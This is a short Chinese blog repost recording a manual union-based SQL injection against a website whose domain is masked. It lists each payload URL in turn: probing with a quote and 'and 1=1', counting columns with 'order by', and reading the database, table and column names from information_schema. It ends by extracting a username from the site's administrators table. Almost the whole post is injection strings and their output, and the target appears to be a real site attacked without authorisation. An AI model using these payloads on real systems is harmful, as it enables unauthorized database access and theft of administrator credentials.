码迷,mamicode.com
首页 > 数据库 > 详细

记一次手动SQL注入

时间:2018-03-23 17:47:47      阅读:287      评论:0      收藏:0      [点我收藏+]

标签:sch   inf   nav   ati   ble   bbr   _id   link   min   

1、检测到可能存在注入漏洞的url 最常用的 ‘ ,and 1=1 ,and 1=2

http://www.xxx.com/subcat.php?id=1

2、判断字段个数

http://www.xxx.com/subcat.php?id=1 order by 1

发现只有一个字段
3、查看数据库名

http://www.xxx.com/subcat.php?id=1 union select database()

数据库名是 bible_history

4、查看表名

http://www.xxx.com/subcat.php?id=1 union select group_concat(table_name) from information_schema.tables where table_schema= bible_history 

有:Emails,administrators,bh_addform,bh_guestbook,bho_board_bans,bho_board_forums,bho_board_posts,bho_board_search,bho_board_topics,bho_board_users,bible_book,books,cat,categories,chapters,chapters1,commentary_jfb,eastons,guestbook,isbe,kingjames,kjv_verse,links,mathew,naves,naves_phrase,naves_verse,ob_book_abbreviation_lookup,outline_chapter

5、查看某个表的字段

http://www.xxx.com/subcat.php?id=1 union select group_concat(column_name) from information_schema.columns where table_name= administrators 

字段有:admin_id,admin_username,admin_password,admin_first_name,admin_last_name

6、查看字段的值

http://www.xxx.com/subcat.php?id=1 union select admin_username from administrators

用户名:jc

参考:https://masterxsec.github.io/2017/05/10/MySQL%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5/

记一次手动SQL注入

标签:sch   inf   nav   ati   ble   bbr   _id   link   min   

原文地址:https://www.cnblogs.com/lanqie/p/8590418.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!